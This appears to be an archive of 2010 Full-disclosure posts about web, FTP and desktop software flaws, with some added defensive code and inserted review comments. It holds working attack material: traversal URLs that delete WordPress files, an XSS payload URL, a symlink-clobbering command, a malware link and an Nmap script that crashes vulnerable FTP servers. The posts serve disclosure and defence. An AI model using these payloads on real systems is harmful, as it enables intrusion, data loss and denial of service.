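    """What a management interface should issue: 128 bits from the OS CSPRNG."""
    return secrets.token_hex(16)  # 32 hex characters

def positional_entropy_bits(tokens):
    """Sum over character positions of the Shannon entropy of the symbols
    observed there.  Bounded by 4 bits per hex position; a counter scheme
    keeps most positions constant and scores close to zero."""
    if not tokens:
        return 0.0
    width = min(len(t) for t in tokens)
    total = 0.0
    for i in range(width):
        counts = Counter(t[i] for t in tokens)
        n = sum(counts.values())
        total += -sum((c / n) * math.log2(c / n) for c in counts.values())
    return total

def looks_sequential(tokens, max_step=16):
    """True if every consecutive pair, read as hex integers, differs by a
    small positive step: the fingerprint of a counter, not a random source."""
    try:
        vals = [int(t, 16) for t in tokens]
    except ValueError:
        return False
    return all(0 < b - a <= max_step for a, b in zip(vals, vals[1:]))

def assess(tokens, min_bits=64):
    """Verdict in the spirit of CWE-331: reject low entropy or sequential IDs."""
    bits = positional_entropy_bits(tokens)
    seq = looks_sequential(tokens)
    return {"entropy_bits": round(bits, 1), "sequential": seq,
            "acceptable": bits >= min_bits and not seq}

if __name__ == "__main__":
    weak = [weak_token(1000 + i) for i in range(200)]
    strong = [strong_token() for _ in range(200)]
    print("weak  :", assess(weak))
    print("strong:", assess(strong))
```

The entropy figure is a coarse plug-in estimate: with a few hundred samples it slightly under-reads a true random source and cannot see structure that is not positional (a timestamp mixed in, a badly seeded PRNG), so a good score is necessary, not sufficient. The sequential test is what catches the counter case the advisory describes. The remedy on the generating side is the strong_token() shape, a CSPRNG-sourced value of at least 128 bits, not a higher threshold in the checker.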


Re: [Full-disclosure] Information Leakage and Full path disclosure vulnerabilities in WordPress

2010-08-03 Thread Henri Salo
rbitrary
> file deletion vulnerability (at CSRF-attack on admin) it can be
> bypassed:
> 
> http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=index.php
> 
> Then it'll be no need to guess file name. It'll work in all versions
> of WordPress with this plugin (WP-DB-Backup <= 2.0).
> 
> And if Directory Traversal hole isn't fixed, then it's possible to
> speed up process of finding of the folder with backups (backup-x)
> with help of Arbitrary file deletion vulnerability (at CSRF-attack on
> admin), and to delete index.php in folder wp-content:
> 
> For WordPress <= 2.0.3 (WP-DB-Backup <= 1.7):
> 
> http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../index.php
> 
> If backups are creating regularly (every day), or certainly known the
> date of creating of backup, then it's possible to easily get it.
> Otherwise, it's possible to guess names of backup files. Or it's
> possible to conduct CSRF-attack on admin and create backup, which
> I'll tell about in the next advisory.
> 
> This leakage of information in backup of DB is the most dangerous
> concerning with that there are login and hash of admin in backup.
> Which can be used for gaining access to the site. It was very actual
> before releasing of WordPress 2.5, in which authorization system was
> remade, after Steven Murdoch drew attention of WP developers at
> Cookie Authentication vulnerability in WordPress
> (http://securityvulns.ru/Sdocument460.html). And from version 2.5 in
> WP new authorization method via cookies is using, but even in new
> versions of engine the leakage of backups is still dangerous and it's
> better not to allow it.
> 
> --
> 2. Full path disclosure.
> --
> 
> There are two Full path disclosure vulnerabilities in WP-DB-Backup,
> which appear at appropriate POST requests. They are working only if
> user has appropriate rights (admin in particular).
> 
> http://websecurity.com.ua/uploads/2010/WordPress%20Database%20Backup%20Full%20path%20disclosure.html
> 
> http://websecurity.com.ua/uploads/2010/WordPress%20Database%20Backup%20Full%20path%20disclosure2.html
> 
> Affected products: these vulnerabilities works in plugin WordPress
> Database Backup 2.0 and previous versions in any versions of
> WordPress.
> 
> --
> Protection against these vulnerabilities.
> --
> 
> For protection it's possible to fix these Full path disclosure
> vulnerabilities by yourself (as others FPD in WordPress), or update
> plugin to last version WP-DB-Backup 2.2.2.
> 
> With WordPress 2.0.11 the version 1.8 of plugin is shipped. As I
> checked recently, Full path disclosure and other vulnerabilities were
> fixed in version 2.1 of the plugin. So the last version of the plugin
> WordPress Database Backup 2.2.2 isn't vulnerable to CSRF and Full
> path disclosure (and isn't vulnerable to above-mentioned Directory
> Traversal, Arbitrary file deletion, DoS and XSS
> (http://websecurity.com.ua/1676/)). But the last version of the
> plugin is still vulnerable to Information Leakage.
> 
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua 

Have you contacted WordPress and/or requested CVE identifiers for these
issues?

Best regards,
Henri Salo

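MustLive's backup=../index.php request is a path traversal in the file name handed to the plugin's delete function. As an added example, not WP-DB-Backup's code, the Python below confines a request-supplied name to the backup directory: a bare-name check that rejects separators and '..', realpath so a planted symlink cannot point outside the directory, and a suffix allow-list; the directory layout the demo builds is constructed to mirror the advisory's wp-content/backup-x description, and all names are mine.

```python
import os
import tempfile

class UnsafePath(ValueError):
    pass

def resolve_inside(base_dir, user_name):
    """Return the absolute path of user_name inside base_dir, or raise.
    Rejects separators, '..' components, absolute paths and symlinks that
    lead outside base_dir (realpath follows them before the check)."""
    if not user_name or user_name != os.path.basename(user_name):
        raise UnsafePath("name must be a bare file name: %r" % user_name)
    if user_name in (".", ".."):
        raise UnsafePath("dot names are not files")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_name))
    if os.path.commonpath([base, target]) != base:
        raise UnsafePath("escapes %s: %r" % (base, user_name))
    return target

def is_confined(base_dir, user_name):
    """Boolean wrapper around resolve_inside for callers that only need a verdict."""
    try:
        resolve_inside(base_dir, user_name)
        return True
    except UnsafePath:
        return False

def delete_backup(base_dir, user_name, allowed_suffix=".sql.gz"):
    """Delete one backup named by the request, confined to base_dir and
    limited to files that look like backups."""
    target = resolve_inside(base_dir, user_name)
    if not target.endswith(allowed_suffix):
        raise UnsafePath("not a backup file: %r" % user_name)
    os.unlink(target)
    return target

def traversal_demo():
    """Constructed layout: an index.php next to a backup-xxxx/ folder that
    holds one real backup and one planted symlink back to index.php.
    Returns (names refused, whether index.php survived)."""
    with tempfile.TemporaryDirectory() as root:
        backups = os.path.join(root, "backup-constructed")
        os.mkdir(backups)
        index = os.path.join(root, "index.php")
        open(index, "w").close()
        open(os.path.join(backups, "site_20100803.sql.gz"), "w").close()
        os.symlink(index, os.path.join(backups, "link.sql.gz"))
        refused = []
        for name in ("../index.php", "/etc/passwd", "index.php",
                     "link.sql.gz", "site_20100803.sql.gz"):
            try:
                delete_backup(backups, name)
            except UnsafePath:
                refused.append(name)
        return refused, os.path.exists(index)

if __name__ == "__main__":
    print(traversal_demo())
```

Only the genuine backup is deleted; the traversal, the absolute path, the wrong-suffix name and the symlink escape are all refused before unlink is reached. The realpath step is what makes the symlink case fail: a pure string check on the name would have accepted link.sql.gz. This confinement addresses the traversal only; the CSRF part of the advisory still needs a per-request token on the delete action.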


[Full-disclosure] WAF fail

2010-07-30 Thread Henri Salo
WAF fail;

http://www.1filesharing.com/search_rapidshare/index.php?q=%22%27%3E%3Cscript%3Ealert%281%29;%3C/script%3Ei&fl=all&source=

1filesharing.com does not reply to abuse emails and won't delete files
even though I have requested it. I have four different malware links still
spreading using that service.

Best regards,
Henri Salo



Re: [Full-disclosure] Someone using Wikipedia to infect others

2010-07-01 Thread Henri Salo
On Thu, 1 Jul 2010 14:36:40 +0300
Henri Salo  wrote:

> Original email attached. Analysis of the malisious URL:
> 
> http://wepawet.iseclab.org/view.php?hash=ea568f176830f3151538ce46a1182be9&t=1277983472&type=js
> 
> Best regards,
> Henri Salo

A few people told me privately to look at the headers. I understand this
email did not come from Wikipedia, but they should definitely react to
this case. An organization like that should know several security contacts.
Wikipedia (and others) should try to get that spammer AND the site
hosting the malicious content off the Internet.

---
Henri Salo



[Full-disclosure] Someone using Wikipedia to infect others

2010-07-01 Thread Henri Salo
Original email attached. Analysis of the malicious URL:

http://wepawet.iseclab.org/view.php?hash=ea568f176830f3151538ce46a1182be9&t=1277983472&type=js

Best regards,
Henri Salo


[Full-disclosure] Fw: [irc-security] UnrealIRCd 3.2.8.1 backdoored on official ftp and site

2010-06-12 Thread Henri Salo


Begin forwarded message:

Date: Sat, 12 Jun 2010 16:14:25 +0200
From: satmd 
To: IRC Security Discussion List 
Subject: [irc-security] UnrealIRCd 3.2.8.1 backdoored on official ftp and site


Hello folks,

I'd like to let you know that there's been a compromise of the 
unrealircd website and ftp and the 3.2.8.1 tarball release had been 
replaced by a backdoored copy.

I'm attaching Syzops original security advisory from 
http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt

Yours,
satmd
UnrealIRCd support staff

Hi all,

This is very embarrassing...

We found out that the Unreal3.2.8.1.tar.gz file on our mirrors has been
replaced quite a while ago with a version with a backdoor (trojan) in
it. This backdoor allows a person to execute ANY command with the
privileges of the user running the ircd. The backdoor can be executed
regardless of any user restrictions (so even if you have a passworded
server or hub that doesn't allow any users in).

It appears the replacement of the .tar.gz occurred in November 2009 (at 
least on some mirrors). It seems nobody noticed it until now.

Obviously, this is a very serious issue, and we're taking precautions
so this will never happen again, and if it somehow does that it will be 
noticed quickly.
We will also re-implement PGP/GPG signing of releases. Even though in
practice (very) few people verify files, it will still be useful for
those people who do.

Safe versions
=============

The Windows (SSL and non-ssl) versions are NOT affected.

CVS is also not affected.

3.2.8 and any earlier versions are not affected.

Any Unreal3.2.8.1.tar.gz downloaded BEFORE November 10 2009 should be 
safe, but you should really double-check, see next.

How to check if you're running the backdoored version
=====================================================
Two ways:

One is to check if the Unreal3.2.8.1.tar.gz you have is good or bad by 
running 'md5sum Unreal3.2.8.1.tar.gz' on it.
Backdoored version (BAD) is: 752e46f2d873c1679fa99de3f52a274d
Official version (GOOD) is: 7b741e94e867c0a7370553fd01506c66

The other way is to run this command in your Unreal3.2 directory:
grep DEBUG3_DOLOG_SYSTEM include/struct.h
If it outputs two lines, then you're running the backdoored/trojanized 
version.
If it outputs nothing, then you're safe and there's nothing to do.

What to do if you're running the backdoored version
===================================================

Obviously, you only need to do this if you checked you are indeed
running the backdoored version, as mentioned above. Otherwise there's no
point in continuing, as the version on our website is (now back) the
good one from April 13 2009 and nothing 'new'.

Solution:
* Re-download from http://www.unrealircd.com/
* Verify MD5 (or SHA1) checksums, see next section (!)
* Recompile and restart UnrealIRCd

The backdoor is in the core, it is not possible to 'clean' UnrealIRCd
without a restart or through a module.

How to verify that the release is the official version
======================================================
You can check by running 'md5sum Unreal3.2.8.1.tar.gz', it should
output: 7b741e94e867c0a7370553fd01506c66  Unreal3.2.8.1.tar.gz

For reference, here are the md5sums for ALL proper files:
7b741e94e867c0a7370553fd01506c66  Unreal3.2.8.1.tar.gz
5a6941385cd04f19d9f4241e5c912d18  Unreal3.2.8.1.exe
a54eafa6861b6219f4f28451450cdbd3  Unreal3.2.8.1-SSL.exe

These are the EXACT same MD5sums as mentioned on April 13 2009 in the 
initial 3.2.8.1 announcement to the unreal-notify and unreal-users 
mailing list.


Finally
=======

Again, I would like to apologize about this security breach.
We simply did not notice, but should have.
We did not check the files on all mirrors regularly, but should have.
We did not sign releases through PGP/GPG, but should have done so.

This advisory (and updates to it, if any) is posted to:
http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt



Re: [Full-disclosure] Virii in the wild

2010-06-04 Thread Henri Salo
> http: //ecard-gre etings-com.googlegrou ps.com/web/ecard.zip
> 
> 8e4830ee84783c6fd17d4475cd1120f0  ecard.zip
> ba8e39a695ea84767adb0b90f5973332  ecard.exe
> 75adc566ab7ee7fc06c19c01413ddb13c090406b  ecard.zip
> 73383ca43fc98fbba5d1358bebfeb9e09864d306  ecard.exe
> 0bdb420658f31cadad291ae497066e8f9227166a02976a548cdb5c57  ecard.zip
> 9a995e18175cedcdb5c041fc96bd71cf6202b8534348664ccae179a9  ecard.exe
> 
> ae875123e2325a54249974eaf425697a  PC_protect.exe
> 411329f5eee7b35494e05d23919122671251343b  PC_protect.exe
> f8d1df776592d7159be5ece59059a9fa76c47cf511dd49ed642cd5ac
> PC_protect.exe
> 
> ecard.exe: OK
> ecard.zip: OK
> PC_protect.exe: OK
> 
> --- SCAN SUMMARY ---
> Known viruses: 798905
> Engine version: 0.96
> Scanned directories: 0
> Scanned files: 3
> Infected files: 0
> Data scanned: 1.45 MB
> Data read: 1.45 MB (ratio 1.00:1)
> Time: 2.815 sec (0 m 2 s)
> 
> https://anubis.iseclab.org/?action=result&task_id=1d65344c1a22298d4c91244f24710205c
> https://anubis.iseclab.org/?action=result&task_id=14865c640caefc854815769e2262e7297
> 
> I already reported this to ClamAV. Contact me if you want the
> binaries.

I also reported this to F-Secure and AVG.

http://www.virustotal.com/analisis/b1d265068e42add36d161de63abcd09d461ba7598bc7bf2187843bcfb1db2e2a-1275679442
http://www.virustotal.com/analisis/8a0d55265395aa8d947d012de267c808e9432d0c218e35210d735f2dd49bae86-1275679472
http://virusscan.jotti.org/en/scanresult/e09e3c7d2a494edc53cc43005ab60c27fde134f7
http://virusscan.jotti.org/en/scanresult/548e8b7a6995c70f3c79dcafbc33cd1d8ea0d3ef

Best regards,
Henri Salo



[Full-disclosure] Virii in the wild

2010-06-04 Thread Henri Salo
http: //ecard-gre etings-com.googlegrou ps.com/web/ecard.zip

8e4830ee84783c6fd17d4475cd1120f0  ecard.zip
ba8e39a695ea84767adb0b90f5973332  ecard.exe
75adc566ab7ee7fc06c19c01413ddb13c090406b  ecard.zip
73383ca43fc98fbba5d1358bebfeb9e09864d306  ecard.exe
0bdb420658f31cadad291ae497066e8f9227166a02976a548cdb5c57  ecard.zip
9a995e18175cedcdb5c041fc96bd71cf6202b8534348664ccae179a9  ecard.exe

ae875123e2325a54249974eaf425697a  PC_protect.exe
411329f5eee7b35494e05d23919122671251343b  PC_protect.exe
f8d1df776592d7159be5ece59059a9fa76c47cf511dd49ed642cd5ac  PC_protect.exe

ecard.exe: OK
ecard.zip: OK
PC_protect.exe: OK

--- SCAN SUMMARY ---
Known viruses: 798905
Engine version: 0.96
Scanned directories: 0
Scanned files: 3
Infected files: 0
Data scanned: 1.45 MB
Data read: 1.45 MB (ratio 1.00:1)
Time: 2.815 sec (0 m 2 s)

https://anubis.iseclab.org/?action=result&task_id=1d65344c1a22298d4c91244f24710205c
https://anubis.iseclab.org/?action=result&task_id=14865c640caefc854815769e2262e7297

I already reported this to ClamAV. Contact me if you want the binaries.


Best regards,
Henri Salo



Re: [Full-disclosure] [Tool]spiderpig --a pdf javascript fuzzer in python

2010-06-03 Thread Henri Salo
On Thu, 3 Jun 2010 16:11:32 +0530
Sachin Shinde  wrote:

> I would like 2 share my new tool spiderpig .
> 
> its a pdf javascript fuzzer which targets only javascript engine of
> reader.
> 
> I know javascript is out and swf are in but still javascript exploits
> will be threat unless reader disables it by default :)
> 
> 
> you can download it from
> http://code.google.com/p/spiderpig-pdffuzzer/
> 
> and for more information see my blog which is here
> http://cons0ul.wordpress.com/
> 
> comments are most welcome !!
> regards,
> cons0ul

Why don't you have the code in an SVN repository?

---
Henri Salo



[Full-disclosure] ftp-libopie.nse in response to CVE-2010-1938

2010-05-27 Thread Henri Salo
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


A vulnerability that has been published today affects the OPIE
Authentication System (libopie).
According to the researchers it could hit many systems like

- OpenSuSE
- wu-ftpd
- mod_opie
- PAM
- openssh (modified by FreeBSD/DragonflyBSD Team)
- sudo
- opiesu
- popper
- Probably much more...

Original advisory:
http://securityreason.com/achievement_securityalert/87
See also:
http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc

Please find attached their PoC as a script for Nmap.
Example Output:
-- PORT   STATE SERVICE
-- 21/tcp open  ftp
-- | ftp-libopie: Likely prone to CVE-2010-1938 (OPIE off-by-one stack overflow)
-- |_See http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc

A.G.


-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.12 (GNU/Linux)
Comment: Using GnuPG with SUSE - http://enigmail.mozdev.org/

iEYEARECAAYFAkv+rS8ACgkQ3aDTTO0ha7j4igCffydmk9Y+U6ocVSNI5RwopoGh
vc0AniRSZZEkW5vgImS4czZsTTzS1bqf
=No6K
-END PGP SIGNATURE-

description = [[
Checks if an FTPd is prone to CVE-2010-1938 (OPIE off-by-one stack overflow).
Vulnerability discovered by Maksymilian Arciemowicz and Adam 'pi3' Zabrocki
]]

---
-- @output
-- PORT   STATE SERVICE
-- 21/tcp open  ftp
-- | ftp-libopie: Likely prone to CVE-2010-1938 (OPIE off-by-one stack overflow)
-- |_See http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc

author = "Ange Gutek"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"intrusive"}

require "shortport"

portrule = shortport.port_or_service(21, "ftp")

action = function(host, port)
  local socket = nmap.new_socket()
  local result
  -- If we use more than 31 chars for the username, ftpd will crash (quoted from the advisory).
  local user_account = string.rep("A", 32)
  local status = true

  local err_catch = function()
    socket:close()
  end

  local try = nmap.new_try(err_catch)

  -- Timeout is in milliseconds; a too-short value would make every target look unresponsive.
  socket:set_timeout(5000)
  try(socket:connect(host.ip, port.number, port.protocol))

  -- Consume the 220 greeting banner so the reads below see replies to our commands.
  try(socket:receive_lines(1))

  -- First, try a safe user so that we are sure that everything is ok
  local payload = "USER opie\r\n"
  try(socket:send(payload))

  status, result = socket:receive_lines(1)
  if status and not (string.match(result, "^421")) then

    -- Second, try the over-long user account
    payload = "USER " .. user_account .. "\r\n"
    try(socket:send(payload))

    status, result = socket:receive_lines(1)
    socket:close()
    if status then
      -- The server still answers: not affected (or OPIE is not in use).
      return
    else
      -- If the server does not answer anymore we may have reached a stack overflow condition.
      return "Likely prone to CVE-2010-1938 (OPIE off-by-one stack overflow)\nSee http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc"
    end
  end

  -- Server refused the first USER (421): nothing to conclude.
  socket:close()
  return
end
___
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/

Re: [Full-disclosure] Mathematica on Linux /tmp/MathLink vulnerability

2010-05-13 Thread Henri Salo
On Fri, 14 May 2010 11:56:10 +1000
paul.sz...@sydney.edu.au wrote:

> "If you're doing anything technical, think Mathematica --..."
>   http://www.wolfram.com/products/mathematica/index.html
> 
> Mathematica7 on Linux uses the /tmp/MathLink directory in insecure
> ways. Mathematica creates or re-uses an existing /tmp/MathLink
> directory, and overwrites files within and follows symlinks. This
> type of behaviour is "known unsafe" on multi-user machines e.g.
> University login servers. As a classic example of a symlink attack,
> if an "attacker" uses:
> 
>   mkdir /tmp/MathLink; ln -s /home/victim/.bashrc /tmp/MathLink/.gshmm
> 
> then when the victim runs Mathematica his ~/.bashrc will be clobbered.
> New files are created world-writable, allowing a complete compromise
> of the user account by linking to ~/.bash_logout . (If root ever uses
> Mathematica then the damage is greater.)
> 
> Mathematica uses also /tmp/fonts$$.conf in insecure ways.
> 
> Workaround: use command-line math instead of pretty interface.
> 
> Notified supp...@wolfram.com on 7 May 2010, was assigned [TS 16194].
> 
> Cheers,
> 
> Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
> School of Mathematics and Statistics   University of Sydney   Australia

Have you requested a CVE identifier for this?

---
Henri Salo
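The report above describes the classic pattern: a fixed, shared path under /tmp that is reused if it already exists, files created world-writable, and symlinks followed on write. The counter-pattern is a fresh, unpredictably named, mode 0700 directory plus exclusive creation that fails on a pre-planted link. The following is an added example written for this thread, not Wolfram's code; the names "MathLink" and ".gshmm" are taken from the report, and the victim file, the sandbox and the planted link in demo() are constructed inside a private temporary directory so the scenario runs offline against nothing but its own files.

```python
"""Private scratch directories and files, as a contrast to the fixed
/tmp/MathLink pattern described in the report above.

Added example, not Wolfram's code.  The names "MathLink" and ".gshmm" are
taken from the report; the victim file and sandbox are constructed here.
"""
import os
import shutil
import stat
import tempfile


def is_private_dir(path):
    """True if path is a real directory owned by us with no group/other bits.

    os.lstat() is used so a symlink planted at a predictable name fails the
    check instead of being followed.
    """
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return False
    if stat.S_ISLNK(st.st_mode) or not stat.S_ISDIR(st.st_mode):
        return False
    if st.st_uid != os.getuid():
        return False
    return (st.st_mode & (stat.S_IRWXG | stat.S_IRWXO)) == 0


def create_private_workdir(prefix="MathLink-"):
    """Fresh, unpredictably named, mode 0700 directory; never reuses a path."""
    return tempfile.mkdtemp(prefix=prefix)


def create_private_file(dirpath, name, data):
    """Create dirpath/name with O_EXCL|O_NOFOLLOW and mode 0600, then write data.

    O_EXCL makes open() fail with EEXIST if anything, a planted symlink
    included, already sits at that name, so a link to ~/.bashrc is never
    followed; the explicit 0600 mode replaces a world-writable default.
    """
    if not is_private_dir(dirpath):
        raise PermissionError("refusing to use non-private directory %r" % dirpath)
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    target = os.path.join(dirpath, name)
    fd = os.open(target, flags, 0o600)
    try:
        os.write(fd, data)
    finally:
        os.close(fd)
    return target


def demo():
    """Constructed scenario: ".gshmm" already points at a victim rc file.

    Returns (victim_unchanged, exclusive_create_refused,
    group_or_other_write_bits_on_new_file); expected (True, True, 0).
    """
    sandbox = tempfile.mkdtemp()
    try:
        victim = os.path.join(sandbox, "victim_bashrc")
        with open(victim, "w") as fh:
            fh.write("original rc\n")

        # A pre-created shared-name directory with a planted link, simulated
        # inside our own sandbox (owned by us, so only the link is at issue).
        shared = os.path.join(sandbox, "MathLink")
        os.mkdir(shared, 0o700)
        os.symlink(victim, os.path.join(shared, ".gshmm"))

        refused = False
        try:
            create_private_file(shared, ".gshmm", b"clobber\n")
        except FileExistsError:
            refused = True
        with open(victim) as fh:
            unchanged = fh.read() == "original rc\n"

        # The safe pattern: a fresh private directory, then an exclusive create.
        work = create_private_workdir()
        created = create_private_file(work, ".gshmm", b"session data\n")
        write_bits = stat.S_IMODE(os.stat(created).st_mode) & (stat.S_IWGRP | stat.S_IWOTH)
        shutil.rmtree(work)
        return unchanged, refused, write_bits
    finally:
        shutil.rmtree(sandbox)
```

The two properties that matter are independent: mkdtemp() removes the predictable name an attacker needs in order to pre-create the directory, and O_CREAT|O_EXCL refuses to write through anything already present at the target name, which is what protects the victim's ~/.bashrc even when a fixed path is unavoidable.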



Re: [Full-disclosure] XSS in Drupal Better Formats Module

2010-04-27 Thread Henri Salo
On Tue, 27 Apr 2010 12:07:17 -0400
"Justin C. Klein Keane"  wrote:

> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
> 
> Description of Vulnerability:
> - -
> Drupal (http://drupal.org) is a robust content management system (CMS)
> written in PHP and MySQL.  The Drupal Better Formats module
> (http://drupal.org/project/better_formats) contains a cross site
> scripting (XSS) vulnerability due to the fact that it fails to
> sanitize format names before display.
> 
> Systems affected:
> - -
> Drupal 6.16 with Better Formats 6.x-1.2 was tested and shown to be
> vulnerable
> 
> Impact
> - --
> User could inject arbitrary scripts into pages affecting site users.
> This could result in administrative account compromise leading to web
> server process compromise.
> 
> Mitigating factors:
> - ---
> In order to execute arbitrary script injection malicious users must
> have 'Administer filters' permission.  The Drupal security team has
> classified vulnerabilities that require this permission
> (http://drupal.org/node/475848) as "display bugs" because access to
> this permission allows for alteration of input specifications that
> could allow users with permissions to create content to craft
> arbitrary PHP. However, in a situation where a user had "administer
> filters" permission but could not create content this vulnerability
> could be used to attack other Drupal users.
> 
> Patch:
> - --
> Applying the following patch mitigates this issue in version 6.x-1.2.
> 
> - --- better_formats/better_formats.module2010-02-05
> 08:59:18.0 -0500
> +++ better_formats/better_formats.module  2010-04-27
> 11:35:53.444189426 -0400 @@ -537,7 +537,7 @@ function
> better_formats_filter_form($val
> 
>  $form = array(
>'#type' => 'fieldset',
> - -  '#title' => $fieldset_title,
> +  '#title' => check_plain($fieldset_title),
>'#collapsible' => $collapsible,
>'#collapsed' => $collapsed,
>'#weight' => $weight,
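Review bot: check_plain() on `$fieldset_title` in the `'#title'` line addresses the unsanitized format names the description names as the cause; confirm where `$fieldset_title` is assembled earlier in better_formats_filter_form(), since a value that is already escaped there would be double-encoded by this line. The context shows only the `$form = array(` block, so whether other members of this array derived from format data also need escaping cannot be judged from the hunk.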
> @@ -551,7 +551,7 @@ function better_formats_filter_form($val
>$parents_for_id = array_merge($parents,
> array($format->format)); $form[$format->format] = array(
>  '#type' => 'radio',
> - -'#title' => $format->name,
> +'#title' => check_plain($format->name),
>  '#default_value' => $default,
>  '#return_value' => $format->format,
>  '#parents' => $parents,
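Review bot: the same check_plain() wrap is applied to `$format->name` for the radio `'#title'`, which is the direct fix for the XSS described; `'#return_value' => $format->format` is left as-is, which is acceptable for a machine-name form value rather than displayed text. The patch covers a single call site, so the advisory should state whether `$format->name` is displayed anywhere else in the module.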
> 
> - -- 
> Justin C. Klein Keane
> http://www.MadIrish.net
> 
> The digital signature on this message can be confirmed
> using the public key at http://www.madirish.net/gpgkey
> -BEGIN PGP SIGNATURE-
> Version: GnuPG v1.4.10 (GNU/Linux)
> Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org/
> 
> iPsEAQECAAYFAkvXC7UACgkQkSlsbLsN1gAYFQb4mjTDJY/6KP2JQIv0pK9H/20s
> g/+dwvKFc78AQMMKqDzi3rfqF4L+RzE6bHPsKHmN7yWIxIGMccbL13rOAvarEzgZ
> jYyfC24Lbhla38p4JkwWltxPNgsH10wXLGdv+BsiFp8oZUpuAQez0N0SNxhr1mX5
> rzZ0fgBEQm7WMmgH9qyLdso1erEQ5sLgPmED5dsaYK2Z2QHBgN19Ed0P1iEZpTdy
> anFseTfo00Uts6zOd3loQ/ZeaAOAnYFZwunOtHVurFPyWpAaM1DGVAOHHWtR265d
> jQMygOdRmQ5qtV/HpA==
> =z0IC
> -END PGP SIGNATURE-

Have you requested a CVE identifier for this vulnerability?

---
Henri Salo



[Full-disclosure] CVE request: VLC <1.0.6 Multiple issues

2010-04-22 Thread Henri Salo
FYI:

Begin forwarded message:

Date: Thu, 22 Apr 2010 20:30:33 +0200
From: Alex Legler 
To: oss-secur...@lists.openwall.com
Subject: [oss-security] CVE request: VLC <1.0.6 Multiple issues


Hi,

in case there was no request from upstream yet:

VLC media player suffers from various vulnerabilities when attempting
to parse malformatted or overly long byte streams.

* Heap buffer overflow vulnerability in A/52, DTS and MPEG Audio decoders
* Invalid memory access in AVI, ASF, Matroska (MKV) demuxers
* Invalid memory access in XSPF playlist parser
* Invalid memory access in ZIP archive decompressor
* Heap buffer overflow in RTMP access

http://www.videolan.org/security/sa1003.html

Thanks,
Alex

-- 
Alex Legler | Gentoo Security / Ruby
a...@gentoo.org | a...@jabber.ccc.de



Re: [Full-disclosure] Amiro.CMS <= 5.4.4 SQL inj

2010-04-22 Thread Henri Salo
On Thu, 22 Apr 2010 21:20:26 +0400
Владимир Воронцов  wrote:

> No.
> 
> On Thu, 22 Apr 2010 18:35:48 +0300, Henri Salo  wrote:
> > On Thu, 22 Apr 2010 09:52:26 +0400
> > Владимир Воронцов  wrote:
> > 
> >> In the site management system Amiro.CMS a critical vulnerability was
> >> found: injection of database operators. The vulnerability allows an
> >> attacker, in particular, to compromise a target system and gain
> >> administrative access.
> >> 
> >> The vulnerability was discovered in the injection of database
> >> operators at user registration. An attacker can fill in the
> >> "signature in the forum" field with special data and affect the
> >> structure of the query to the DBMS. Information about the request is
> >> not displayed on the screen, thus it is possible to conduct "blind"
> >> injections in order to obtain data, or injections in order to displace
> >> the data. The injection takes place in the database INSERT operator.
> >> Further details were not disclosed at the request of the developer.
> >> 
> >> Original in Russian: http://onsec.ru/vuln?id=20
> > 
> > Have you requested a CVE identifier for this?
> > 
> > ---
> > Henri Salo
> 

Please do: http://cve.mitre.org/


Re: [Full-disclosure] Amiro.CMS <= 5.4.4 SQL inj

2010-04-22 Thread Henri Salo
On Thu, 22 Apr 2010 09:52:26 +0400
Владимир Воронцов  wrote:

> In the site management system Amiro.CMS a critical vulnerability was
> found: injection of database operators. The vulnerability allows an
> attacker, in particular, to compromise a target system and gain
> administrative access.
> 
> The vulnerability was discovered in the injection of database operators
> at user registration. An attacker can fill in the "signature in the
> forum" field with special data and affect the structure of the query to
> the DBMS. Information about the request is not displayed on the screen,
> thus it is possible to conduct "blind" injections in order to obtain
> data, or injections in order to displace the data. The injection takes
> place in the database INSERT operator. Further details were not
> disclosed at the request of the developer.
> 
> Original in Russian: http://onsec.ru/vuln?id=20

Have you requested a CVE identifier for this?

---
Henri Salo


Re: [Full-disclosure] Insufficient Anti-automation and Denial of Service vulnerabilities in multiple systems

2010-04-14 Thread Henri Salo
On Tue, 13 Apr 2010 21:35:30 -0700
Kaddeh  wrote:

> First off, I am curious how many of the developers responded to your
> notification to them about these vulnerabilities.
> Secondly, just a thought, if you are testing a piece of obscure
> software, at least try and link to their site/repo or whatever.
> Third, if all of these CMS vulns that you are finding are true, I am
> assuming that they are possible, why are you testing CMS software
> that was last updated 2 years ago like HoloCMS (at least, without
> proper links to home pages, I can't tell short of doing a Google
> search). Additionally, I would assume that you tested these on a
> machine that you yourself have, specs of this machine would be nice,
> I know that I have seen several vulns come through that can be
> reproduced, but you have to have a very select configuration (ie,
> document.write "bugs" that only fail on 32-bit, VM issues with VT-x
> on 32-bit, etc)
> 
> Cheers
> 
> Kad

A two-year-old release might still be vulnerable. That should tell
people a lot about the state of overall security. I still can't figure
out why MustLive doesn't request CVE numbers.

I also believe there might be little to no automated security testing
for this not-so-well-known CMS software.

---
Henri Salo


